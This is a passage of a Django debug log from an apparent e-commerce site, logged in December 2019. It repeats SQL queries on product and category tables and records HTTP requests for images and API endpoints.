(0.002) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE ("shop_product"."available" = true AND "shop_product"."category_id" = 1) ORDER BY "shop_product"."name" ASC; args=(True, 1) [29/Dec/2019 19:45:54] "GET /api/v1/fire/ HTTP/1.0" 200 482 [29/Dec/2019 19:45:54] "GET /media/products/2019/12/05/SampleGIFImage_350kbmb_vsJs0Zd.gif HTTP/1.0" 200 355854 [29/Dec/2019 19:45:54] "GET /media/products/2019/12/06/monika-grabkowska-zE6fKdd9QLI-unsplash.jpg HTTP/1.0" 200 3039441 [29/Dec/2019 19:45:54] "GET /media/products/2019/12/06/nathan-dumlao-9m6XwFTWGKs-unsplash.jpg HTTP/1.0" 200 3337046 [29/Dec/2019 19:45:55] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-29 19:47:21,933 utils 2749 140297222735616 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-29 19:47:21,942 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-29 19:47:21,946 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-29 19:47:21,948 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-29 19:47:21,952 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-29 19:47:21,955 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-29 19:47:21,957 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-29 19:47:21,960 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-29 19:47:21,963 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-29 19:47:21,967 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-29 19:47:21,969 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-29 19:47:21,972 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-29 19:47:21,974 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-29 19:47:21,977 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-29 19:47:21,980 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-29 19:47:21,983 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-29 19:47:21,985 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-29 19:47:21,988 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-29 19:47:21,990 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-29 19:47:21,996 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-29 19:47:22,000 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-29 19:47:22,005 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-29 19:47:22,008 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-29 19:47:22,012 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-29 19:47:22,015 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-29 19:47:22,019 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-29 19:47:22,023 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-29 19:47:22,026 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-29 19:47:22,030 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-29 19:47:22,033 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-29 19:47:22,038 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-29 19:47:22,041 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-29 19:47:22,044 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-29 19:47:22,047 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-29 19:47:22,050 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-29 19:47:22,054 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-29 19:47:22,057 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-29 19:47:22,059 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-29 19:47:22,062 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-29 19:47:22,065 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-29 19:47:22,069 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-29 19:47:22,074 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-29 19:47:22,078 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-29 19:47:22,081 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-29 19:47:22,086 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-29 19:47:22,089 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [29/Dec/2019 19:47:22] "GET /api/v1/categories/ HTTP/1.0" 200 15396 Not Found: /api/api-token-auth/ [29/Dec/2019 19:47:48] "OPTIONS /api/api-token-auth/ HTTP/1.0" 404 6374 DEBUG 2019-12-29 19:47:51,163 utils 2749 140297222735616 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-29 19:47:51,169 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-29 19:47:51,173 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-29 19:47:51,176 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-29 19:47:51,179 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-29 19:47:51,181 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-29 19:47:51,183 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-29 19:47:51,186 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-29 19:47:51,188 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-29 19:47:51,192 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-29 19:47:51,194 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-29 19:47:51,196 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-29 19:47:51,199 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-29 19:47:51,201 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-29 19:47:51,205 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-29 19:47:51,207 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-29 19:47:51,209 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-29 19:47:51,211 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-29 19:47:51,214 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-29 